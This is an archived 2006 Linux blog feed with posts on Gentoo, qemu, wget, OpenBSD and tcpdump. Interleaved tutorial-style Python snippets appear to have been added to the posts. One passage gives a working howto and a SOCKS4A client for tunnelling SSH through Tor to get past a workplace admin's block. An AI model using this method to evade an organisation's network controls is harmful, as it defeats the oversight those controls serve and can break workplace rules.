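    header = struct.pack("!BBH4s", SOCKS_VERSION, CMD_CONNECT, port, b"\x00\x00\x00\x01")
    return header + userid + b"\x00" + hostname + b"\x00"


def parse_reply(data: bytes):
    """Parse the fixed 8-byte reply (VN=0, CD, DSTPORT, DSTIP); return (granted, code)."""
    if len(data) < 8:
        raise ValueError("short SOCKS4 reply")
    vn, cd, _port, _ip = struct.unpack("!BBH4s", data[:8])
    if vn != 0:
        raise ValueError(f"unexpected SOCKS4 reply version {vn}")
    return cd == REPLY_GRANTED, cd


def connect_via_socks4a(host, port, socks_host="127.0.0.1", socks_port=9050, timeout=30):
    """Open a TCP stream to host:port through the SOCKS4A proxy; returns the socket.

    The caller (ssh, in the post's setup) then speaks SSH over this socket as if
    it were connected directly to the server.
    """
    s = socket.create_connection((socks_host, socks_port), timeout=timeout)
    try:
        s.sendall(build_connect_request(host, port))
        reply = b""
        while len(reply) < 8:  # the reply may arrive in pieces
            chunk = s.recv(8 - len(reply))
            if not chunk:
                raise ConnectionError("proxy closed the connection during the handshake")
            reply += chunk
        granted, code = parse_reply(reply)
        if not granted:
            raise ConnectionError(f"SOCKS4A: {REPLY_TEXT.get(code, hex(code))}")
        return s
    except Exception:
        s.close()
        raise


if __name__ == "__main__":
    # With Tor running locally this prints the SSH banner of the post's target host.
    conn = connect_via_socks4a("chi.spunge.org", 22)
    print(conn.recv(64))
    conn.close()
```

The request is the same bytes whatever the hostname resolves to, so a sniffer on the blocked network only ever sees a connection to the local Tor port and Tor's own traffic to relays on 80/443; a proxy reply other than 0x5A means Tor could not build the circuit or the exit refused port 22.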
6. Run the tor and privoxy services.<br /><span style="font-style:italic;">shell>/etc/init.d/tor start<br /></span><br /><span style="font-style:italic;">shell>/etc/init.d/privoxy start</span><br /><br />7. Test our configuration. Yey..\0/<br /><span style="font-weight:bold;">before</span><br /><span style="font-style:italic;">yomuds@gentoob0x ~ $ ssh yomuds@chi.spunge.org</span><br />ssh_exchange_identification: Connection closed by remote host<br />demm!!<br /><br /><span style="font-weight:bold;">after</span><br /><span style="font-style:italic;">shell>ssh yomuds@myillegalssh.org</span><br />Welcome to Spunge.org. Please log in....<br /><br />yomuds@chi.spunge.org's password:<br />Last login: Mon Sep 4 14:42:52 2006 from static-68-179-33-129.ptr.terago.ca<br />System News -<br /><br />Tadaaa!!!!<br />--------------------------------end howto---------------------------------------<br /><br />This howto works only as long as your admin doesn't block the Tor network itself; if he does, we're out of luck. It happened to me. :( Demm. *update* I was wrong, our admin hasn't blocked the Tor network yet. Huhh, legaa!! :D \o/yomudshttp://www.blogger.com/profile/10660119780422829194noreply@blogger.com3tag:blogger.com,1999:blog-16641472.post-1156096974561663292006-08-20T10:49:00.000-07:002006-08-20T11:02:54.573-07:00gentoo + arch not set..mor0n...--------------------------error start-----------------------------------<br />gentoob0x yomuds # emerge -av dsniff<br /><br />These are the packages that I would merge, in order:<br /><br />!!! ARCH is not set... Are you missing the /etc/make.profile symlink?<br />!!! Is the symlink correct? Is your portage tree complete?<br /><br />-------------------------error end-------------------------------------<br /><br />Have you guys had this problem after emerging with the --sync option? 
If you have, here is a solution to overcome this problem.<br /><br /><span style="font-style:italic;">shell> ls -al /etc/make.profile</span><br />Check where the /etc/make.profile symlink points. If it points to the correct profile (/usr/portage/profiles/default-linux/x86/2006.0), then it shouldn't be the problem. If it doesn't, you need to recreate the symlink: remove the current /etc/make.profile first.<br /><br /><span style="font-style:italic;">shell>rm /etc/make.profile<br />shell>ln -s /usr/portage/profiles/default-linux/x86/2006.0 /etc/make.profile<br /></span><br /><br />Hope this helps. :D Gentoo always has bad surprises for you guys. Btw, Gentoo roxx!! :Dyomudshttp://www.blogger.com/profile/10660119780422829194noreply@blogger.com0tag:blogger.com,1999:blog-16641472.post-1155918921540801492006-08-18T09:07:00.000-07:002006-08-18T09:35:21.570-07:00vmware player & qemu : not a perfect match..:PAha, I'm glad I'm using qemu instead of VMware Workstation. Anyway, all of this is just a matter of personal taste. Working in a Linux environment, certain things can be done easily with CLI tools. :D A few people say that changing settings on qemu is quite difficult, like changing the RAM size, the CD-ROM file, network settings and bla bla bla. If you use qemu frequently, don't forget the key combination "ctrl+alt+2": it switches to the qemu monitor, which lets you manipulate qemu's behaviour. :D Trust me, it's easier to run qemu than VMware Player; at least with qemu I don't need to recompile kernel modules every time I build a new kernel. Hahaha. Just another excuse. Anyway, I just finished configuring and installing a FreeBSD image using qemu. But since my friend needs to run this image in VMware Player, I created the image in VMDK format instead. Example of creating a VMDK image with qemu (note that the result is a VMDK disk image despite the .iso name I gave it; a .vmdk extension would be less confusing):<br /><br />shell> qemu-img create -f vmdk Freebsd.iso 10G<br /><br />I was thinking at that moment that there couldn't be any problems when I boot the image using VMware Player. I was wrong, dudes. 
VMware Player only recognizes a configuration file with the extension *.vmx. What? Then I was clueless: how could I create that *.vmx file when I don't even have VMware Workstation (no pirated software, please)? Lucky for me, a *.vmx file is only a text file. :D Kewl. The next thing was to google around about the VMware Player config file. I stumbled onto <a href="http://www.consolevision.com/members/dcgrendel/vmxform.html">this</a> site. Woww, great effort, man. Thanks, noobacide. :D noobacide's tool lets you manually build a *.vmx file to fit your needs. :D Here is my *.vmx config file (ide0:0 is the VMDK disk image, hence deviceType "disk" even though the file name ends in .iso):<br /><br />----------------begin-------------------------<br />config.version = "8"<br />virtualHW.version = "3"<br /><br />MemAllowAutoScaleDown = "FALSE"<br />MemTrimRate = "-1"<br /><br />uuid.location = "56 4d 5c cc 3d 4a 43 29-55 89 5c 28 1e 7e 06 58"<br />uuid.bios = "56 4d 5c cc 3d 4a 43 29-55 89 5c 28 1e 7e 06 58"<br /><br />uuid.action = "create"<br />checkpoint.vmState = ""<br /><br />displayName = "FreeBSD 6.0"<br />guestOS = "freeBSD"<br />memsize = "256"<br /><br />ethernet0.present = "TRUE"<br />ethernet0.connectionType = "bridged"<br />ethernet0.addressType = "generated"<br />ethernet0.generatedAddress = "00:0c:29:7e:06:58"<br />ethernet0.generatedAddressOffset = "0"<br /><br />usb.present = "TRUE"<br />usb.generic.autoconnect = "TRUE"<br /><br />sound.present = "TRUE"<br />sound.virtualdev = "es1371"<br /><br />scsi0.present = "TRUE"<br />scsi0.virtualdev = "buslogic"<br /><br />scsi0:0.present = "FALSE"<br /><br />scsi0:1.present = "FALSE"<br /><br />floppy0.present = "TRUE"<br />floppy0.fileName = "A"<br />floppy0.startConnected = "FALSE"<br /><br />ide0:0.present = "TRUE"<br />ide0:0.fileName = "FreeBSD-6.0.iso"<br />ide0:0.deviceType = "disk"<br />ide0:0.mode = ""<br />ide0:0.redo = ""<br />ide0:0.writeThrough = "TRUE"<br />ide0:0.startConnected = "TRUE"<br /><br />ide0:1.present = "TRUE"<br />ide0:1.fileName = "cdrom"<br />ide0:1.deviceType = "cdrom-raw"<br />ide0:1.autodetect = "FALSE"<br />ide0:1.startConnected = "FALSE"<br /><br />ide1:0.present = "FALSE"<br /><br />ide1:1.present = "FALSE"<br /><br />----------------end----------------------------------<br /><br />Aha, it's quite a lot of work before you can 'freely' use your new image. :D So I'm not going to use VMware Player as long as qemu is still in my hands. :P Nuff said.<br /><br />p/s: why do I always get problems when compiling a brand new kernel, even with 'make oldconfig' from a working kernel? :( My bad.yomudshttp://www.blogger.com/profile/10660119780422829194noreply@blogger.com1tag:blogger.com,1999:blog-16641472.post-1153740187807541682006-07-24T01:35:00.000-07:002006-07-24T05:39:55.163-07:00Open Source CLI downloader -wget - aget roxxIt's kind of uncomfortable for me when I can't download all the content of an article I'm reading because it is chapter-based or section-based. By doing that, the authors tend to forget to provide one single html/pdf/whatever file. *sigh* Don't get me wrong, I'm not here to complain about the authors or the articles. It's really nice if we only need to save/download a single file rather than a bunch of files with weird names like "chap01_sec1_titleX_beginner.html". Huhh. :D Anyways, back to the post title: downloaders. Lucky for us, there are downloaders that can download a whole directory for us. Speaking of which CLI downloaders fit me, I picked wget and aget. Why aget? Simply because wget doesn't support simultaneous (multi-connection) downloading of a single file. Here is the wget command to download all files inside a directory. We can control how far wget recursively crawls and keep it to one directory. 
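To make that depth control concrete, here is an added example (not the post's code and not wget's implementation) of the scope rule a bounded recursive download applies before following a link: same host, under the starting directory (what wget's --no-parent enforces), and at most the allowed number of hops away (wget's -l). The site map is constructed for the example, loosely modelled on the freeos.com guide directory the post fetches.

```python
"""Scope rule for a bounded recursive download: depth limit plus no-parent.

Added example, not wget's code. The SITE map below is constructed test data.
"""
from urllib.parse import urljoin, urlsplit


def base_dir(url: str) -> str:
    """Directory part of the start URL: http://h/a/b.html -> /a/, http://h/a/ -> /a/."""
    path = urlsplit(url).path or "/"
    return path if path.endswith("/") else path.rsplit("/", 1)[0] + "/"


def in_scope(start: str, link: str, depth: int, max_depth: int) -> bool:
    """True if `link`, reached in `depth` hops from `start`, may be fetched."""
    s, l = urlsplit(start), urlsplit(link)
    if l.scheme not in ("http", "https") or l.netloc != s.netloc:
        return False  # other hosts are never in scope
    if depth > max_depth:
        return False  # the -l limit
    # The --no-parent rule: depth alone does not stop "../" links, which would
    # pull in the whole site one level at a time.
    return (l.path or "/").startswith(base_dir(start))


def plan_crawl(start: str, pages: dict, max_depth: int) -> list:
    """Breadth-first walk over an in-memory site map {url: [hrefs]}; returns fetch order."""
    seen, order, queue = {start}, [], [(start, 0)]
    while queue:
        url, depth = queue.pop(0)
        order.append(url)
        for href in pages.get(url, []):
            nxt = urljoin(url, href).split("#", 1)[0]  # a fragment is the same document
            if nxt in seen or not in_scope(start, nxt, depth + 1, max_depth):
                continue
            seen.add(nxt)
            queue.append((nxt, depth + 1))
    return order


# Constructed site map: the start page links sideways, downward, upward and off-site.
START = "http://www.freeos.com/guides/lsst/"
SITE = {
    START: ["index.html", "aboutauth.html", "ch01/", "../", "http://other.example/x"],
    START + "index.html": ["ch01/sec1.html", "../../"],
    START + "ch01/": ["sec1.html", "sec2.html"],
    START + "ch01/sec1.html": ["sec3.html"],
}

if __name__ == "__main__":
    for level in (1, 2):
        print(f"-l {level}:")
        for url in plan_crawl(START, SITE, level):
            print("  ", url)
```

With `-l 1` only the four pages directly under lsst/ are fetched; the "../" link is one hop away but is dropped by the no-parent rule, and the off-site link by the host rule. With `-l 2` the chapter pages are added but sec3.html, three hops deep, is still left alone.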
When you enable recursive downloading without controlling how far wget can crawl, you're in big trouble, because wget will fetch every file on the website, which we don't want. Besides -l, the --no-parent (-np) option stops wget from climbing above the starting directory, which -l alone does not prevent.<br /><br /><span style="font-style: italic;">shell>wget -r -k -l 1 http://www.example.com/articles/</span><br /><br />-r for recursive<br />-k convert all links to local files<br />-l level of depth wget can crawl<br /><br /><span style="font-style: italic;">shell >wget -r -k -l 1 http://www.freeos.com/guides/lsst/<br />---------------------------output------------------------------------<br />00:37:59 (1.23 KB/s) - `www.freeos.com/guides/lsst/aboutauth.html' saved [3267/3267]<br /><br />--00:37:59-- http://www.freeos.com/guides/lsst/index.html<br /> => `www.freeos.com/guides/lsst/index.html'<br />Connecting to www.freeos.com|66.98.242.53|:80... connected.<br />HTTP request sent, awaiting response... 200 OK<br />Length: 12,438 (12K) [text/html]<br />--------------------------end-----------------------------------------</span><br /><br /><br />Btw, if you want to download a bash-scripting tutorial, the link I provided is a good resource for that. Have nice reading days ahead.<br />Oops, I use aget when I want a simultaneous download. You can use aget like this:<br /><br /><span style="font-style: italic;">shell> aget -n 10 http://mirror.oscc.org.my/fedora/core/4/i386/iso/FC4-i386-disc1.iso</span><br /><br />-n how many threads (parallel connections) you want to open<br /><br />-happy downloading with open source tools.:p<br />yomudshttp://www.blogger.com/profile/10660119780422829194noreply@blogger.com3tag:blogger.com,1999:blog-16641472.post-1152863677908218982006-07-14T00:19:00.000-07:002006-07-14T05:50:37.206-07:00qemu:another problems faded awayToday I played with <a href="http://www.fedora.org">Fedora Core</a> at home, which I installed 5-6 months back. 
The motivation behind this was that I got 192MB of SDRAM from a friend, Hafiz. Thanks, dude. :D So I installed the RAM and tested it with my old/ancient PC running Fedora Core 4. Hahh, my BIOS showed that I had an extra 192MB of RAM. Hahaha. Gud. :D While my Fedora was booting smoothly, I figured out how long this machine had gone without any sort of update. :D Hehh. The <a href="http://www.kernel.org">kernel</a> was still the default installed one, 2.6.11.x; the current kernel is 2.6.17.4. Hahaa. So I was thinking of updating this system. Being a Streamyx-less home, I decided to bring this machine to my workplace to upgrade it. Ohh, wait, why not just unplug the hard disk and run it through qemu? Woow, nice idea. Besides that, I bought a new tool called a "USB 2.0 to IDE cable". Nifty tool, I tell you. I recommend you have one (you can find it at Low Yat). So I can plug my Fedora hard disk into the USB cable and I'm ready to go. :D qemu even asked me which kernel to pick at boot. :D Seems like I'm going to use this approach to upgrade my two other machines running <a href="http://www.openbsd.org">OpenBSD</a> 3.8 and <a href="http://www.freebsd.org">FreeBSD</a> 6.0. One caveat: qemu writes to the raw disk here, so make sure none of its partitions is mounted on the host at the same time, or host and guest will corrupt each other's filesystem.<br /><br /><span style="font-style: italic;">shell>qemu -hda /dev/sda -m 128 -user-net</span><br /><br />When qemu started booting my Fedora Core disk, I encountered a simple problem with the <a href="http://www.xorg.org">Xorg</a> settings. I fixed this problem with a new display setting of 800x600. So now I'm ready for my upgrading process. Here is a screenshot of my Fedora Core updating itself with yum. :D<br /><div align="center"><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://photos1.blogger.com/blogger/3002/1585/1600/fedora-upgade-qemu0.png"><img style="cursor: pointer;" src="http://photos1.blogger.com/blogger/3002/1585/320/fedora-upgade-qemu0.png" alt="" border="0" /></a><br /></div><br /><br />I have to say that I hate yum so much. :D Hehhe. It's freaking slow compared to the ports/portage system. Btw, lucky me to have our Malaysian Fedora mirror provided by <a href="http://www.oscc.org.my">OSCC</a>. You can check the mirror <a href="http://mirror.oscc.org.my">here</a>. I also have a CentOS 4.2 qemu image to update, but don't worry, let's finish this update first. :D Thanks to qemu's brilliant features.<br /><br /><br /><br />yomudshttp://www.blogger.com/profile/10660119780422829194noreply@blogger.com1tag:blogger.com,1999:blog-16641472.post-1152267964892183712006-07-07T02:46:00.000-07:002006-07-07T03:26:06.963-07:00OpenBSD: network installation thru qemuYesterday I tried to upgrade my OpenBSD 3.8 virtual machine running on qemu inside my Gentoo box. After reading a couple of docs/howtos, I was ready to give my OpenBSD 3.8 an upgrade. Goshh!! The CVS port is closed. Demm. I had no choice now. Since the official OpenBSD FAQ/docs recommend always installing a brand new release with a fresh install, I went for it. Aha, now, waiting for my notebook to finish downloading all the OpenBSD files to make an ISO CD, I'm getting tired. 
My stomach cries, asking to be fed. :( So I decided to just install through the network. I downloaded a file called floppy39.fs (the 3.9 boot floppy image), then created an image file for the new OpenBSD installation. Ohh, wait! I need a bootable floppy first, but I don't have a floppy drive. Thanks to qemu for letting us boot from any bootable image file. I created an image file for the bootable floppy and copied the contents of floppy39.fs into it (you could also pass floppy39.fs straight to -fda; and note the .iso names below are just names, these are raw/qcow disk images, not ISO 9660 filesystems).<br /><br /><br /><span style="font-style: italic;">root@vm>qemu-img create openbsdfloppy.iso 2M</span><br /><span style="font-style: italic;">root@vm>dd if=floppy39.fs of=openbsdfloppy.iso</span><br /><br /><br />Next is to create my installation disk image for OpenBSD 3.9.<br /><br /><br /><span style="font-style: italic;">root@vm>qemu-img create -f qcow openbsd3-9.iso 6G</span><br /><br /><br />Then I fired up qemu to boot from openbsdfloppy.iso and install OpenBSD through the network.<br />root@vm>qemu -fda openbsdfloppy.iso -hda openbsd3-9.iso -m 64 -user-net -boot a<br /><br />Aha, much quicker actually, compared with downloading the OpenBSD files and converting them to an ISO. 
When installing OpenBSD, I picked network installation through HTTP using the mirror in Japan {http://ftp.jp.openbsd.org}. You can read more details on installing OpenBSD on the official OpenBSD docs page. :D Nah, I can go for dinner now and just let OpenBSD finish the rest. :D<br /><br /><br />Today I issued the command 'uname -a' on my VM, and I got:<br /><br /><br /><span style="font-weight: bold;">OpenBSD OpenBSD3-9.netbytesec.com 3.9 GENERIC#XXX i386</span><br /><br /><br /><br />Ahaa, nice. So today I'm just installing a few network tools like honeyd, snort, etc. Oops, I also need fluxbox and rxvt. Heh. To ease my daily needs. :D<br />Ohh, one more thing: please buy an original CD from www.openbsd.org. :D I haven't got mine. :(yomudshttp://www.blogger.com/profile/10660119780422829194noreply@blogger.com0tag:blogger.com,1999:blog-16641472.post-1152009145782525652006-07-04T03:04:00.000-07:002006-07-04T03:32:26.480-07:00tcpdump filterThese two weeks I was playing a lot with network tools. One of the tools is <a href="http://www.tcpdump.org">tcpdump</a>. Usually I tend to ignore any sort of tcpdump filter trick; I just fire up tcpdump with basic options like "-vv -n -s 1515 -x". But that is not a clean way of capturing packets. In this situation, what I plan to do is to avoid any non-TCP traffic, the port 22 traffic of my own SSH session to the box, and traffic from hosts that are not suspicious. So here is the tcpdump filter [note to myself, \0/].<br /><br /><br /><span style="font-style: italic;">tcpdump -vv -n -s 1515 -x tcp and 'port !22' and not host 192.168.1.1 and not host 192.168.1.2</span><br /><br /><br />Notice that tcpdump uses BPF-style filter expressions. The <span style="font-style: italic;">tcp</span> primitive captures only TCP traffic, and <span style="font-style: italic;">not host</span> excludes traffic to or from that host. 
In this example, I avoid capturing traffic from my hosts 192.168.1.1 and 192.168.1.2. The <span style="font-style: italic;">'port !22'</span> part is tcpdump's shorthand for <span style="font-style: italic;">not port 22</span> and drops the SSH traffic. Notice that the '!' is quoted: the quotes are for the shell, not for tcpdump, because in an interactive bash session an unquoted '!' triggers history expansion (and unquoted parentheses would be taken by the shell as well), so be careful with shell metacharacters in filter expressions. Actually, this is a basic tcpdump command; there are a lot of tcpdump tricks and tips out there, and the best place to learn more about tcpdump is www.tcpdump.org.<br /><br /><br />The other network tools I played with are scapy, ruby libpcap and rubyforger. Huhh, maybe I'll reserve these tools for the next post. Heh. :Dyomudshttp://www.blogger.com/profile/10660119780422829194noreply@blogger.com0tag:blogger.com,1999:blog-16641472.post-1151483235217386742006-06-28T00:54:00.000-07:002006-06-28T01:29:35.980-07:00first post for the old blog<div style="text-align: justify;">Aha. Now I'm starting to feel weird again. When you're blogging, you're actually communicating with your readers. But I don't have readers, not even one. I used to have a blog before and it's still there, somewhere in this big world of the internet. So why am I moving to this Blogspot? Nah, I'm tired of fighting with spammers. They roxx. :D I don't think this Blogspot account will be my main blog. It's just temporary, I guess. :D My plan is to have a mock-up blog before I'm ready to set up the real one. When the real blog is ready, I'm moving to the real one. Huhh. Enough for the first post. Hopefully by the second post I'll start to blog about technical stuff. I do love to share.</div>yomudshttp://www.blogger.com/profile/10660119780422829194noreply@blogger.com0